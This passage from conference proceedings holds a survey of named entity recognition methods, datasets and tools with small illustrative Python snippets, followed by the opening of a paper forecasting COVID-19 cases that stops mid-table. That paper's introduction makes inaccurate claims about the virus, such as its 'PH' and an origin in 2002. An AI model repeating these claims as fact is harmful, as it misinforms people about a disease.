Exercise (IREX) in Japan [IREX HP], and the shared task at CoNLL in 2002 and 2003 for four languages,
English, German, Dutch and Spanish [CoNLL HP]. In the IREX project, another class, artifact, for example,
“Odyssey” as a book title or “Windows” as a product name, was added to the original MUC classes. The NE
task in MUC was inherited by the ACE project in the U.S., where two new categories were included:
geographical and political entities, for example, “France” or “New York”, and facility, for example,
“Empire State Building” [1].
Petasis et al. [2] restricted the definition of named entities: “A NE is a proper noun, serving as a name for
someone or something”. This restriction is justified by the significant proportion of proper nouns (persons,
places, or things) present in a corpus. “Named” limits the task to only those entities for which one or several
rigid designators stand for the referent. Rigid designators include proper names as well as natural kind terms
such as biological species and substances. Regardless of the different definitions of NEs, researchers have
reached common agreement on the types of NEs to recognize and mostly separate NEs into two categories:
generic NEs and domain-specific NEs (e.g., proteins, chemicals, and genes). This survey principally centers
on generic NEs in the English language [3]. NER has been an active research area in recent years, and
automated NER and extraction systems are a very popular research topic.

1.2 Motivations for Conducting This Survey

Over the last two decades, various topics such as deep learning (DL) have attracted critical attention because
of their success in different areas. DL-based NER approaches with minimal feature engineering have been
growing. In recent years, an extensive number of studies have applied deep learning techniques to NER and
progressively advanced the state-of-the-art performance. This pattern motivates us to conduct this study to
survey the current state of deep learning techniques in the field of NER research. By contrasting the choices
of DL architectures, our objective is to identify factors influencing NER performance as well as problems
and challenges.
NER studies have been developing for a couple of decades. As far as we know, there are not many surveys
in this field so far. Probably the most established one was presented by Nadeau and Sekine [1] in 2007.
Marrero et al. [4] summed up NER works from the perspectives of fallacies, challenges, and opportunities
in 2013.
The intention of this paper is to present a survey of the various technique trends in NER. The remainder of
the paper is organized as follows. A detailed insight into the related background of the aforementioned study
is presented in the next section. Section 3 provides the systematic literature review of related work. Section 4
provides the challenges and future directions, and finally the conclusion is given in Sect. 5.

2 Related Background

2.1 NER

NER is presumably the initial step toward information extraction; it tries to locate and classify named
entities in text into pre-defined categories, for example, the names of people, locations, organizations, areas,
quantities, monetary values, percentages, and so forth. NER is utilized in numerous fields in NLP. NER acts
as an autonomous tool as well as plays a very important role in various NLP applications like speech
recognition, chatbots, sentiment analysis, text classification, automatic summarization, etc.

2.2 NER Datasets

A tagged or labeled corpus is a collection of documents that includes annotations of one or more entity
types. Prior to 2005, datasets were mostly developed by annotating news stories with a few entity types,
suitable for coarse-grained NER tasks. From then onwards, a large number of datasets were generated based
on different content sources, including Wikipedia articles, conversations, and user-generated content. The
number of tag types also turns out to be significantly larger, e.g., 89 in OntoNotes [5]. Most ongoing NER
works report their performance on the CoNLL03 and OntoNotes datasets. The CoNLL [6] datasets comprise
newswire data in four European languages, Spanish, Dutch, English and German, and are labeled with four
entity types (PER, LOC, ORG, MISC). OntoNotes is a more challenging corpus, containing three languages
that do not share scripts, Arabic, Chinese and English, and it contains 18 NER types. The GENIA [7] corpus
is also used for the task of NER. OntoNotes has an enormous number of labelled entities. The objective of
the OntoNotes project was to annotate a large corpus, containing different genres such as blogs and several
groups of news, with structural information (syntax and predicate argument structure) and shallow semantics
(word sense linked to an ontology, and coreference). Another corpus is MUC-6 [8], which is also used for
the task of NER. This corpus contains 318 annotated Wall Street Journal articles, the scoring software, and
the corresponding documentation used in the MUC-6 evaluation. The importance of the MUC-6 corpus and
MUC-6 Additional News Text is that they can be used to replicate the evaluation.

2.3 NER Tools

There are various tools available online for English text. Some of the tools which
can be used for NER are—(i) Natural Language Toolkit (NLTK) [9], (ii) Polyglot
[10], (iii) Stanford CoreNLP [11], (iv) LingPipe [12], (v) Allen NLP [13], and (vi)
ScispaCy [14].
One tool which can be used for NER is NLTK, an open source library for the Python programming language.
It is the most commonly used platform for working with human language data using Python. NLTK provides
more than 50 corpora and various lexical resources, and it also has libraries for classification, tokenization,
lemmatization and chunking. It comes with a hands-on guide that introduces topics in computational
linguistics as well as programming basics for Python, which makes it suitable for linguists who have no
deep background in programming, and for developers and researchers who need to dive into computational
linguistics.
Another tool which is in trend for NER is ScispaCy, an open source library for advanced NLP on scientific
and biomedical text. The ScispaCy NER pipeline uses a word embedding strategy based on sub-word
features and Bloom embeddings, together with a 1D convolutional neural network (CNN). A Bloom
embedding is similar to a word embedding but is a more space-optimized representation; it gives each word
a separate representation for each particular context it appears in. The 1D CNN is then applied over the input
text to classify a sentence/word into a set of predetermined categories.
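As a brief illustration of how such a tool is typically used (this snippet is not from the surveyed papers, and
the model name "en_core_sci_sm" is an assumed, separately installed scispaCy model), the recognized
entities can be read directly from the processed document:

# Minimal spaCy/scispaCy usage sketch; the model name is an assumption.
import spacy

nlp = spacy.load("en_core_sci_sm")  # a pretrained scispaCy pipeline with an NER component
doc = nlp("The patient was treated with aspirin after a myocardial infarction.")

for ent in doc.ents:  # iterate over the recognized entities
    print(ent.text, ent.label_, ent.start_char, ent.end_char)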
There are various steps in NER, such as tokenization, lemmatization, part-of-speech (POS) tagging, and
chunking, which can be performed with any of these tools (a short NLTK sketch of these steps is given after
the list). The steps are:
(i) Tokenization: The basic tokenizer splits the text into sentences and the sentences into tokens. For
example, the sentence “he is playing cricket" is split into tokens as [‘he’, ‘is’, ‘playing’, ‘cricket’].
(ii) Lemmatization: Lemmatization is the process in which a word is converted to its root form, like caring
to care or playing to play. Lemmatization identifies the root or base form of a word, whereas stemming just
cuts off the suffix (such as ‘ing’) from the word, which makes a huge difference. A stem might not be a real
word, but a lemma is always a real word. In lemmatization, ‘Caring’ converts into ‘care’, whereas in
stemming ‘Caring’ converts into ‘car’.
(iii) POS Tagging: POS tagging reads the text and assigns a tag to each and every word. Tagging is a kind
of classification that may be defined as the automatic assignment of a descriptor to each token. The
descriptor is called a tag, which may represent one of the parts of speech, semantic information, etc. For
example, the sentence “he is playing cricket" is tagged as [(‘he’, ‘PRP’), (‘is’, ‘VBZ’), (‘playing’, ‘VBG’),
(‘cricket’, ‘NN’)].
(iv) Chunking: Chunking is also known as chunk extraction and shallow parsing. It is the method of
extracting meaningful short phrases from a sentence that has been tagged with POS, and it adds structure to
the POS-tagged sentence. There is at most one level between the root and the leaves in shallow parsing or
chunking, whereas deep parsing consists of more than one level.
The primary usage of chunking is to build groups of noun phrases. The parts of speech are combined with
regular expressions. There are no predefined rules for chunking, but rules can be made as per the needs or
requirements.
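The following minimal NLTK sketch (illustrative only, not taken from the survey) runs steps (i)–(iv) on the
example sentence; the nltk.download resource names reflect a typical setup and are assumptions.

import nltk
from nltk.stem import WordNetLemmatizer

# Resources for tokenization, tagging, lemmatization and NE chunking (assumed setup)
for pkg in ["punkt", "averaged_perceptron_tagger", "wordnet", "maxent_ne_chunker", "words"]:
    nltk.download(pkg, quiet=True)

sentence = "He is playing cricket in New York"

tokens = nltk.word_tokenize(sentence)                                  # (i) tokenization
lemmas = [WordNetLemmatizer().lemmatize(t, pos="v") for t in tokens]   # (ii) lemmatization
tagged = nltk.pos_tag(tokens)                                          # (iii) POS tagging

# (iv) chunking: a hand-made noun-phrase grammar, plus NLTK's built-in NE chunker
grammar = "NP: {<DT>?<JJ>*<NN.*>+}"
np_tree = nltk.RegexpParser(grammar).parse(tagged)
ne_tree = nltk.ne_chunk(tagged)

print(tokens)    # ['He', 'is', 'playing', 'cricket', 'in', 'New', 'York']
print(lemmas)    # ['He', 'be', 'play', 'cricket', 'in', 'New', 'York']
print(tagged)    # e.g. [('He', 'PRP'), ('is', 'VBZ'), ('playing', 'VBG'), ...]
print(ne_tree)   # shallow tree in which "New York" is grouped as a GPE entity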

2.4 Techniques for NER

The capacity to identify previously unknown entities is a significant part of NER and classification. This
capacity rests upon recognition and classification rules induced from various features associated with
positive and negative examples. While a large portion of the earlier studies depended on hand-crafted rules,
most recent systems use supervised machine learning as a technique to automatically induce rule-based
systems or sequence labeling algorithms starting from a collection of training examples [1]. NER and
classification techniques [15] are categorized into three types: (i) rule-based NER, (ii) learning-based NER,
and (iii) hybrid NER.

2.4.1 Rule-Based Technique

Several earlier IE and NER systems are based on hand-crafted rules [1]. They employ domain-specific
features to identify and classify NEs using syntactic-lexical patterns and a series of hand-crafted grammatical
rules written by computational linguists. These rules work well to extract information that follows specific
patterns. The main drawbacks are that they are domain-specific and time-consuming due to the manual
construction of the rules.
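As a toy illustration of this idea (not an example from the cited systems), a single hand-crafted pattern can
tag capitalized word sequences ending in a typical organization suffix; the pattern and suffix list below are
assumptions chosen purely for illustration.

# A toy rule-based NER sketch: one hand-crafted pattern for ORGANIZATION mentions.
import re

# Capitalized words followed by an (assumed) organization suffix
ORG_RULE = re.compile(r"\b(?:[A-Z][a-z]+ )+(?:Inc|Ltd|Corp|University)\b")

text = "Sharda University and Acme Ltd signed an agreement in Greater Noida."
for match in ORG_RULE.finditer(text):
    print(match.group(), "-> ORGANIZATION")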

2.4.2 Learning-Based Technique

Learning-based techniques can be classified into the following three types (a minimal supervised-learning
sketch is given after this list):


(i) Supervised Learning: Supervised learning is learning in which the model is trained using labeled
datasets. Labeled datasets are those which contain both input and output parameters. A learning algorithm
then trains a model to generate a prediction for the response to new data or the test dataset. Examples of
supervised learning are regression and classification, and the output may be categorical or numeric.
Regression refers to problems in which the output variable is a real value, for example “dollars" or “weight",
whereas classification refers to problems in which the output variable is a category, for example “black" or
“blue" and “disease" or “no disease". A few supervised learning algorithms are Naive Bayes classification,
support vector machines, decision trees, linear regression, and ordinary least squares regression.
(ii) Unsupervised Learning: Unsupervised learning is the learning technique in which supervision of the
model is not needed. In unsupervised learning, the user allows the model to work on its own to discover
information, and it mainly deals with unlabeled data. With unsupervised learning, users can perform more
complex tasks compared with supervised learning, which deals with tagged data, although unsupervised
learning can also be more unpredictable. Using unsupervised learning, users can find unknown patterns in
the data. Obtaining unlabeled data is easier than obtaining labeled data. This is called unsupervised learning
because there is no teacher for training the model and there is no correct answer. Clustering and association
are techniques of unsupervised learning.
(iii) Semi-supervised Learning: The semi-supervised learning technique combines a limited quantity of
labeled data with an enormous amount of unlabeled data. Semi-supervised learning is a good technique to
try because labeling data is expensive and also takes more time.
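As a minimal illustration of the supervised setting (not drawn from any of the surveyed systems), each token
of a labeled toy corpus can be described by a few simple features and fed to an off-the-shelf classifier; the
toy data, the feature choices, and the ENT/O label set below are assumptions.

# A tiny supervised-learning sketch: classify tokens as entity (ENT) or not (O).
from sklearn.feature_extraction import DictVectorizer
from sklearn.naive_bayes import MultinomialNB

def token_features(token):
    # Simple hand-made features per token (assumed for illustration)
    return {"lower": token.lower(), "is_title": token.istitle(), "is_upper": token.isupper()}

train_tokens = ["John", "works", "at", "Google", "in", "London", "every", "day"]
train_labels = ["ENT", "O", "O", "ENT", "O", "ENT", "O", "O"]   # the annotated (labeled) data

vec = DictVectorizer()
X_train = vec.fit_transform(token_features(t) for t in train_tokens)
clf = MultinomialNB().fit(X_train, train_labels)

test_tokens = ["Mary", "lives", "in", "Paris"]
X_test = vec.transform(token_features(t) for t in test_tokens)
print(list(zip(test_tokens, clf.predict(X_test))))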

2.4.3 Hybrid Technique

The hybrid technique combines the learning-based technique with the rule-based technique. It has the
advantages of both techniques. The final results are obtained by combining the results of two or more
techniques. Systems based on this technique are found to be more accurate than systems based on an
individual technique.

3 A Systematic Literature Review of Related Work

This section provides an overview of the state of the art in NER.


Lin et al. [16] presented a combination of character-level representations, syntactic word representations,
and word-level representations for building a comprehensive word representation. Peters et al. [17]
suggested TagLM, a language-model-augmented sequence tagger which uses both pre-trained word
embeddings and bidirectional language model embeddings for each token in the input sequence for the
sequence tagging task.
A unified learning algorithm and neural network architecture was proposed by Collobert et al. [18]. It is a
single system performing various NLP tasks and is used as the basis for developing a freely available tagging
system with minimal computation requirements and good performance. A neural model to recognize nested
entities by dynamically stacking flat NER layers until no outer entities are extracted was presented by Ju
et al. [19]. Each flat NER layer uses a bidirectional LSTM to capture the sequential context. The model
merges the output of the LSTM layer in the current flat NER layer to build new representations for the
detected entities and then feeds them into the next flat NER layer.
A multi-task joint model was proposed by Yang et al. [20] which discovers language-specific regularities
and is jointly trained for POS tagging, chunking, and NER. Rei [21] found that by including an unsupervised
language modeling objective in the training process, the sequence labeling model achieves consistent
performance improvements. Nadeau et al. [22] presented a system for named entity recognition and
disambiguation using unsupervised methods. This model combines entity extraction and disambiguation
based on simple yet highly effective heuristics.
Zhang and Elhadad [23] in their research present an unsupervised learning method to extract named entities
from biomedical text. Instead of supervision, their system relies on terminologies, corpus statistics, and
shallow syntactic knowledge. Experiments on two popular biomedical data sets demonstrate the performance
of their unsupervised learning method. Biomedical NER applications show a trend towards semi-supervised
methods since they offer broader and cheaper corpus arrangements. The application of semi-supervised
systems in the field of chemical NER may improve performance since it takes into account a huge number
of unannotated documents and enables the improvement of models without depending on training corpora.

Däniken and Cieliebak [24] extended Yang's work to allow joint training on an informal corpus and to
incorporate sentence-level feature representations. Their system took second place at the WNUT 2017
shared task for NER. Zhao et al. [25] proposed a multi-task model with domain adaptation, where the fully
connected layer is adapted to different types of datasets, and the conditional random field (CRF) [26]
features are computed independently. A significant advantage of Zhao's model is that instances with
divergent distributions and mismatched annotation guidelines are filtered out simply in the data selection
process. Lin and Lu [27] proposed a transfer learning approach for NER by introducing three neural
adaptation layers: a word adaptation layer, a sentence adaptation layer, and an output adaptation layer.
Various NER models have been developed using an MLP and softmax as the label decoder. Softmax is used
as the label decoder to predict named entities in chess game commentaries as a specific NER task in [28].
It takes inputs both from the text and from the chess board (9 × 9 squares with 40 pieces of 14 distinct types)
and predicts 21 named entities specific to this game. Text representations and game state embeddings are
both fed into a softmax layer for the prediction of named entities using the BIO tagging scheme.
Goyal et al. [15] reviewed improvements and advances made in NER; however, they do not cover recent
advances in deep learning methods. A short outline of recent progress in NER based on representations of
words in a sentence is presented by Yadav and Bethard [29]. This overview focused on distributed
representations for the input and did not investigate the context encoders and label decoders. The ongoing
trend is to apply deep learning to the task of NER.
An attention mechanism to dynamically decide how much information to use from a character-level or
word-level component in an end-to-end NER model was implemented by Rei et al. [30]. Zukov-Gregoric
et al. [31] studied the self-attention mechanism in NER, where the weights depend on a single sequence
(rather than on the relation between two sequences).
Xu et al. [32] presented an attention-based neural NER architecture to leverage document-level global
information; in particular, the document-level information is obtained from the document representation
produced by a pre-trained bidirectional language model with neural attention. An adaptive co-attention
network for tweets is used by Zhang et al. [33]. This adaptive co-attention network is a multi-modal model
using a co-attention process. Co-attention includes visual attention and textual attention to capture the
semantic interaction between different modalities.

4 Challenges and Future Directions

4.1 Challenges

(i) Ambiguity and Abbreviations: One of the significant difficulties in recognizing named entities is language
itself: identifying words which can have numerous meanings or words that can be part of various phrases.
Another significant challenge is grouping similar words from texts, since many words or sentences can be
written in various forms. Words can be abbreviated for simplicity of writing and comprehension, and words
which sometimes require additional context for identification are another significant challenge.
(ii) Data Annotation: Supervised NER methods require a huge amount of annotated data during training.
Producing a huge amount of annotated data is very expensive and also very time consuming. Thus, it is a
major challenge for some particular areas, as domain specialists are required to perform the annotation
tasks.
(iii) Quality and Consistency are also concerns because of the ambiguity of the language. The same name
may be annotated with different labels such as place, organization name, person name, etc. Suppose there
is a sentence “U.S. President stayed in the Whitehouse". Whitehouse can be an organization name like
Whitehouse Pvt. Ltd., and the Whitehouse is also the official residence of the U.S. President, so it creates
confusion in the entity boundaries. Quality therefore plays an important role in NER. Consistency also plays
a significant role: because of inconsistency in data annotation, a model trained on one dataset may not
perform the task appropriately on another dataset, even if the documents in both datasets belong to the same
domain.
(iv) Foreign words also play a major role in this field. There are various words which have not been heard
by many people, while other words are used by people frequently on a daily basis; handling both kinds is
another major challenge in this field.
(v) Vowels can also be a challenge because there can be a large difference between how a word is spoken
and how it is written; two words may sound similar yet be different.

4.2 Future Directions

With the advancement of various language modeling techniques, more attention should be given to NER by
researchers. NER is generally viewed as a pre-processing step for downstream applications, which implies
that a specific NER task is defined according to the demands of the downstream application. Some directions
for further research in NER are:
(i) Fine-grained NER and boundary identification: Most studies concentrate only on coarse-grained NER in
the general domain, so there should be more research on fine-grained NER in specific domains. One of the
challenges in fine-grained NER is the significant increase in the number of NE types, and hence the difficulty
introduced by allowing a named entity to have multiple NE types. This calls for revisiting the standard NER
approaches in which entity boundaries and types are detected simultaneously. It is worth considering named
entity boundary identification as a dedicated task for the detection of NE boundaries while ignoring NE
types. Decoupling boundary identification from NE type classification enables common and robust solutions
for boundary detection that can be shared across different domains, together with dedicated domain-specific
techniques for NE type classification.
(ii) NER on Informal Text with Auxiliary Resources: The performance of deep learning based NER on
informal or user-generated content remains low, so more research is required in this area. Auxiliary
resources are frequently required for a better understanding of user-generated content. The main questions
are how to obtain suitable auxiliary resources for NER on user-generated content or in a specific domain,
and how to effectively incorporate such auxiliary resources into the NER task.
(iii) Scalability of NER: Making NER models more scalable is still a challenging task. Solutions are still
needed to handle the rapidly growing model size and computational cost when the amount of data becomes
large [34]. Numerous NER models have achieved good performance, but at the cost of huge computing
power. For example, the ELMo representation assigns to every word a 3 × 1024-dimensional vector, and
the model took 5 weeks to train on 32 GPUs [35], while Google's BERT was trained on 64 cloud TPUs.
Developing approaches that balance model complexity and scalability would be a promising direction.

5 Conclusion

The named entity recognition (NER) field has been flourishing in recent decades. Named entity tasks play
a very important role in natural language technologies. NER is continuously enriched due to its major
contribution to numerous natural language processing (NLP) applications. The aim of this research is to
survey recent studies on NER solutions and help researchers build a strong base in this field. This research
gives researchers insight into the evolution of NER and the datasets, tools, and techniques that can be
employed in NER. It also helps novice researchers gain insight into the challenges in NER. In addition, a
review of rule-based, learning-based, and hybrid NER systems has been presented. After reviewing most of
the papers, we found that supervised learning methods are used when a large collection of annotated data is
available, whereas unsupervised learning methods are used when the data is unannotated. Various recent
studies in the field of NLP have proposed many types of unsupervised and semi-supervised techniques
which allow quick adaptation to various entity types without the need for an annotated corpus. Finally,
future directions are also presented to facilitate researchers to improve NER techniques and guide them to
progress in this research field.

References

1. Nadeau, D., & Sekine, S. (2007). A survey of named entity recognition and classification.
Lingvisticae Investigationes, 30(1), 3–26.
2. Petasis, G., Cucchiarelli, A., Velardi, P., Paliouras, G., Karkaletsis, V., & Spyropoulos, C.
D. (2000). Automatic adaptation of proper noun dictionaries through cooperation of machine
learning and probabilistic methods. Proceedings of SIGIR, 128–135.
3. Li, J., Sun, A., Han, J., & Li, C. (2018). A survey on deep learning for named entity recognition.
IEEE Transactions On Knowledge And Data Engineering, 20.
4. Marrero, M., Urbano, J., Sánchez-Cuadrado, S., Morato, J., & Gómez-Berbís, J. M. (2013).
Named entity recognition: Fallacies, challenges and opportunities. Computer Standards &
Interfaces, 35, 482–489.
5. Weischedel, R., Hovy, E., Marcus, M., Palmer, M., Belvin, R., Pradhan, S., Ramshaw, L., &
Xue, N. (2011). OntoNotes: A large training corpus for enhanced processing. In Handbook of
natural language Processing and machine translation: DARPA global autonomous language
exploitation. Springer.
6. Sang, E. F. T. K. (2002). Introduction to the CoNLL-2002 shared task: Language-independent
named entity recognition. In Proceedings of the 6th Conference on Natural Language Learning.
Stroudsburg, PA, USA. Association for Computational Linguistics (Vol. 31, pp. 1–4).
7. Kim, J. D., & Ohta, T. (2003). GENIA corpus-a semantically annotated corpus for bio-
textmining (Vol. 19).
8. Grishman, R., & Sundheim, B. (1996). Message understanding conference-6: A brief history.
In Proceedings of the 16th Conference on Computational Linguistics, COLING (Vol. 1, pp.
466–471).
9. Bird, S., Loper, E., & Klein, E. (2009). Natural language processing with python (Vol. 36, pp.
767–771). O’Reilly Media Inc.
10. Al-Rfou, R., Kulkarni, V., & Perozzi, B. (2014). POLYGLOT-NER: Massive multilingual named
entity recognition (Vol. 1).
11. Manning, C., Surdeanu, M., & Bauer, J. (2014). The Stanford CoreNLP natural language
processing toolkit. Proceedings of 52nd Annual Meeting of the Association for Computational
Linguistics: System Demonstrations (pp. 55–60).
12. Kang, Y., Cai, Z., Tan, C.-W., Huang, Q., & Liu, H. (2020). Natural language processing (NLP)
in management research: A literature review. Journal of Management Analytics, 7(2), 139–172.
13. Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M.,
& Zettlemoyer, L. (2017). AllenNLP: A deep semantic natural language processing platform.
In Proceedings of Workshop for NLP Open Source Software (NLP-OSS), Technical report (pp.
1–6,).
14. Neumann, M., & King, D. (2019). ScispaCy: Fast and robust models for biomedical natural
language processing. In Proceedings of the BioNLP workshop, 319–327.
15. Goyal, A., Gupta, V., & Kumar, M. (2018). Recent named entity recognition and classification
techniques: A systematic review. Computer Science Review, 29, 21–43.
16. Lin, B. Y., Xu, F., Luo, Z., & Zhu, K. (2017). Multi-channel bilstm-crf model for emerging
named entity recognition in social media. In Proceedings of the 3rd Workshop on Noisy User-
generated Text (pp. 160–165).
17. Peters, M. E., Ammar, W., Bhagavatula, C., & Power, R. (2017). Semisupervised sequence
tagging with bidirectional language models. In Proceedings of ACL (pp. 1756–1765).

18. Collobert, R., Weston, J., Bottou, L., Karlen, M., Kavukcuoglu, K., & Kuksa, P. (2011). Natural
language processing (almost) from scratch. Journal of Machine Learning Research, 12, 2493–
2537.
19. Ju, M., Miwa, M., & Ananiadou, S. (2018). A neural layered model for nested named entity
recognition. Proceedings of NAACL-HLT, 1, 1446–1459.
20. Yang, Z., Salakhutdinov, R., & Cohen, W. (2016). Multi-task cross-lingual sequence tagging
from scratch. arXiv. 2.
21. Rei, M. (2017). Semi-supervised multitask learning for sequence labeling. Proceedings of ACL
(pp. 2121–2130).
22. Nadeau, D., Turney, P. D., & Matwin, S. (2006). Unsupervised named entity recognition:
Generating gazetteers and resolving ambiguity. In Proceedings of the Canadian Society for
Computational Studies of Intelligence (pp. 266–277). Springer.
23. Zhang, S., & Elhadad, N. (2013). Unsupervised biomedical named entity recognition: Experi-
ments with clinical and biological texts. Journal of Biomedical Information, 46, 1088–1098.
24. Däniken, P. V., & Cieliebak, M. (2017). Transfer learning and sentence level features for named
entity recognition on tweets. In Proceedings of the 3rd Workshop on Noisy User-generated Text
(pp. 166–171).
25. Zhao, H., Yang, Y., Zhang, Q., & Si, L. (2018). Improve neural entity recognition via multi-task
data selection and constrained decoding. NAACL-HLT, 2, 346–351.
26. Sutton, C., McCallum, A., & Rohanimanesh, K. (2007). Dynamic conditional random fields:
Factorized probabilistic models for labeling and segmenting sequence data. Journal of Machine
Learning Research, 8, 693–723.
27. Lin, B. Y., & Lu, W. (2018). Neural adaptation layers for cross-domain named entity recogni-
tion. Proceedings of AAAI, 12, 2012–2022.
28. Tomori, S., Ninomiya, T., & Mori, S. (2016). Domain specific named entity recognition refer-
ring to the real world by deep neural networks. Proceedings of ACL, 2, 236–242.
29. Yadav, V., & Bethard, S. (2018). A survey on recent advances in named entity recognition from
deep learning models. In Proceedings of COLING (pp. 2145–2158).
30. Rei, M., Crichton, G. K., & Pyysalo, S. (2016). Attending to characters in neural sequence
labeling models. In Proceedings of COLING (pp. 309–318).
31. Zukov-Gregoric, A., Bachrach, Y., Minkovsky, P., Coope, S., & Maksak, B. (2017). Neural
named entity recognition using a selfattention mechanism. In Proceedings of ICTAI (pp. 652–
656).
32. Xu, G., Wang, C., & He, X. (2018). Improving clinical named entity recognition with global
neural attention. In Proceedings of APWeb-WAIM (pp. 264–279).
33. Zhang, Q., Fu, J., Liu, X., & Huang, X. (2018). Adaptive co-attention network for named entity
recognition in tweets. In AAAI.
34. Batmaz, Z., Yurekli, A., Bilge, A., & Kaleli, C. (2018). A review on deep learning for recom-
mender systems: Challenges and remedies. Artificial Intelligence Review, 1–37.
35. Akbik, A., Blythe, D., & Vollgraf, R. (2018). Contextual string embeddings for sequence
labeling. In Proceedings of COLING (pp. 1638–1649).
Assessing Spatiotemporal Transmission
Dynamics of COVID-19 Outbreak Using
AI Analytics

Mayuri Gupta, Yash Kumar Singhal, and Adwitiya Sinha

Abstract Coronavirus is a respiratory disease which is caused by the virus SARS-CoV-2. The symptoms of
the coronavirus include flu, sore throat, common cold, cough, fatigue, and shortness of breath. COVID-19
is a pandemic that has spread across the world. In this paper, we present a model to analyze the trend of the
coronavirus. We used artificial intelligence analytics including linear regression, support vector machine,
auto regressive integrated moving average, and long short-term memory methods on real coronavirus data
using Python 3.0 (Jupyter Notebook). The prediction shows the cumulated trend prediction of confirmed
cases. The linear regression and ARIMA models give the best results with maximum accuracy (98% and
99.87%, respectively) and performed better than existing counterparts. Later, we will develop specialized
deep learning models, including multilayer perceptron and autoencoders, for trend prediction with better
accuracy.

Keywords Coronavirus · Artificial intelligence · Linear regression · Predictive


analysis · ARIMA · LSTM · COVID-19 · Disease outbreak

1 Introduction

The coronavirus is covered by a protective layer of fat and is observed to have a changing genetic code. The
virus follows a decaying procedure and cannot be destroyed easily. However, the virus has comparatively
low resistance, and hence detergent and soap can cut through the layer of fat, thereby destroying the virus
eventually [1]. The coronavirus particles are highly transmissible and can stay stable in cold climates and
in the air conditioning systems of vehicles and houses. The coronavirus requires moisture to remain active,
particularly at night or in the dark, whereas a warm, dehumidified,

M. Gupta · A. Sinha (B)


Department of Computer Science & Engineering and Information Technology, Jaypee Institute of
Information and Technology, Noida-62, Uttar Pradesh, India
Y. K. Singhal
Department of Computer Science and Engineering, Indian Institute of Technology, Jodhpur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 829
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_67

dry, and the sunny climate tends to deteriorate it. The coronavirus PH lies between
5.5 and 8.5. It is spread by the virus SARS-CoV-2. It was accepted that it is a microor-
ganism found in bats in 2002; however, it has begun spreading in different creatures
like cats and people. First, it was found in southern China in 2002. Coronavirus
started from Wuhan, China in December 2019. Later, it expanded to the whole of
China and, subsequently, the whole world. In January 2020, WHO announced coron-
avirus as a Public Health Emergency of International Concern (PHEIC), and later in
March 2020, WHO announced it was pandemic, and thus, lockdown started in many
countries. Due to the coronavirus, people with weak immunity are mostly affected,
especially infants, senior citizens, and people with heart disease and diabetes. In our
research work, we have used artificial intelligence (AI) techniques, including linear
regression (LR), support vector machine (SVM), long short-term memory (LSTM),
and auto-regressive integrated moving average (ARIMA) to predict the trend of
COVID-19.

2 Literature Survey

There are various works and research that have been performed on coronavirus prediction using machine
learning (ML) algorithms, deep learning (DL), etc. In a recent research conducted in [1], Car et al. in May
2020 aimed to build a valid regression model through an AI algorithm using the dataset employed in their
implementation. The main goal of the model is to consider all the gathered data together, instead of splitting
it by location, because ML can give insights into the factors surrounding the spread of coronavirus and
hence allows us to make accurate predictions. In another paper [2], Sujath et al. in May 2020 presented a
model that was helpful to analyze the spread of coronavirus. In this, the authors applied multilayer perceptron
(MLP), vector autoregression (VAR), and LR strategies to analyze the disease and the movement of
coronavirus cases in India. The MLP algorithm showed better prediction outcomes compared to the LR and
VAR techniques using Orange and WEKA. Tuli et al. in May 2020 presented a model which used the
Generalized Inverse Weibull distribution, with which a good fit can be achieved for the analysis framework
[3]. This work used a cloud computing platform for real-time prediction and better accuracy regarding the
spread behavior of the pandemic. They selected ML algorithms that can be executed easily on cloud
platforms for correct prediction and a timely response by citizens and authorities. In another recent research
[2], the authors analyzed the role of ML and AI as an important procedure in the areas of prediction,
screening, contact tracing, forecasting, and drug development for the virus SARS-CoV-2 and its spread.
This research presented a diagnosis approach using ML and AI on CT images (1020) of coronavirus, which
included a study of 108 infected patients along with 86 viral pneumonia patients; the authors used a
convolutional neural network (ResNet-101), and the resulting accuracy and specificity were 83.33% and
86.27%, respectively. The research also reports that 11 pertinent indices were extracted using the random
forest model with overall accuracies of 96.97% and 95.95%, respectively. In yet another recent contribution,
Rustam et al. in May 2020 formulated ML models to estimate the number of patients affected by coronavirus
[4]. In this research, the authors used four models: linear regression (LR), least absolute shrinkage and
selection operator (LASSO), support vector machine (SVM), and exponential smoothing. In [5], the authors
Chaurasia and Pal in July 2020 predicted the further spread of this virus by utilizing time-series data to
forecast the number of deceased patients globally; the work included time-series predictive modeling using
various techniques, searching for the best procedure for analyzing the coronavirus dataset, and using the
ARIMA algorithm for future estimation of deceased rates globally. In paper [6], Khanday et al. in June 2020
classified a textual clinical dataset into different categories by utilizing ensemble and classical ML
algorithms. They used NLP techniques like term frequency/inverse document frequency, report length, and
bag of words (BOW) for optimal feature engineering, and they fed the features to ensemble and traditional
ML classifiers. Multinomial Naive Bayes and logistic regression showed good results compared to other
ML models, with 96.2% testing accuracy. Burdick et al. created a model for fitting “boosted" decision trees
by utilizing the XGBoost classifier algorithm [7]. The XGBoost classifier implements gradient boosting,
which uses an ensemble of classifiers that integrates outcomes from multiple decision trees to generate
prediction scores. Each tree successively splits the patients into smaller groups. The splitting continues until
a patient reaches a leaf node, which belongs to one class or the other based on whether the value of a feature
is above or below some threshold. Jamshidi et al. in June 2020 proposed a response to the spread of the virus
by using DL and AI analytics, consisting of generative adversarial networks (GANs), extreme learning
machines, and LSTM, to achieve the target output [8]. The main advantage of these AI applications is to
expedite the process of treatment and diagnosis of the coronavirus ailment.

3 Proposed Methodology

The following section summarizes the dataset and the proposed methodology for
prediction of COVID-19 trend in India.

3.1 Dataset Description

Table 1 shows the coronavirus data published by the Center for Systems Science and Engineering (CSSE)
at Johns Hopkins University [9]. The dataset consists of 273 rows and 384 columns and shows worldwide
cumulative deaths, total cases, and recoveries along with latitude and longitude [10]. India, being the second
largest in world population, draws special attention of researchers to predict the COVID-19 trend [11].
Hence, another dataset, shown in Table 2, is extracted from the Indian Ministry

Table 1 COVID-19 dataset of Countries Worldwide


Country/Region Lat Long 1/22/20 1/23/20 1/24/20 1/25/20 1/26/20 1/27/20 … 11/23/20 11/24/20 11/25/20 11/26/20 11/27/20
Afghanistan 33.93911 67.709953 0 0 0 0 0 0 … 44,988 45,174 45,384 45,600 45,723
Albania 41.15330 20.168300 0 0 0 0 0 0 … 33,556 34,300 34,944 35,600 36,245
